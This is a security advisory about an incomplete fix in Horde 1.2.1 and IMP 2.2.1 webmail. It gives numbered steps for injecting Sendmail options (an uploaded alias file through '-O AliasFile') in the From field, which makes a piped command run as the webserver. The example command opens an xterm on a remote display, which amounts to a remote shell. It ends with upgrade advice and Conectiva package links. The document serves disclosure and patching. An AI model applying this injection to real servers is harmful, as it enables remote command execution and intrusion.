COMMAND

    IMP

SYSTEMS AFFECTED

    Horde v1.2.1 & IMP v2.2.1

PROBLEM

    Jens  Steube  found  following.   The  Fix  of  the first detected
    problem with  the $from  variable in  the horde  library was  just
    escaping  shellchars  which  avoids  directly  executing commands.
    It is still possible to exploit the parsed $from line and  execute
    commands under the uid  and gid of the  webserver.  This has  been
    tested under Debian 2.2 (potato).

    Rxploit is e.g: Horde and IMP, as MTA we use Sendmail (v8.11.0)

    0. The job is to send a  mail to a address which is defined  in an
       aliasfile  which  is  manually  added  to Sendmail.  This alias
       pipes to a command.
    1. Logon to IMP and open a compose window.
    2. Locally  open a  texteditor and  write a  line in mta-aliasfile
       format. After that, save it locally.  line e.g:

        evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"

    3. Upload the local stored file as an attachment.
    4. Open the html source-code of the compose-window and search  for
       '/tmp'.
    5. You  will  find  the  local  stored  filename  and path of  the
       attachment on the webserver.  Copy it to the Clipboard.   Mind:
       that filename looks like /tmp/php??????.att
    6. Just close the compose window!
    7. Open a new compose window.
    8. As your FROM-line insert line e.g: (including all quotetypes)

        <"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">

    9. As your TO-line insert the useralias, which you have defined in
       the uploaded attachement.

        e.g: evil@localhost

    10. Leave all other fields blank and send the mail.
    11. Exploited.

    Above exploit works out with Sendmail in most configurations,  but
    other MTAs could also be exploited the same way.  Notice that just
    disabling of the AliasFile flag is not enough to prevent attacking
    this bug because most  MTAs also provide other  commandswitches to
    include external configuration.

SOLUTION

    There's an update available which  should be a more complete  fix.
    The Horde  team announced  the availability  of IMP  2.2.2 -- this
    version is "part 2" to  a security vulnerability present in  2.2.0
    (and  earlier  "pre"  releases)  that  was only partially fixed in
    2.2.1.   Users  of  IMP  2.2  on  production  systems are STRONGLY
    ENCOURAGED to upgrade.

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-devel-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-doc-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-devel-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-doc-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm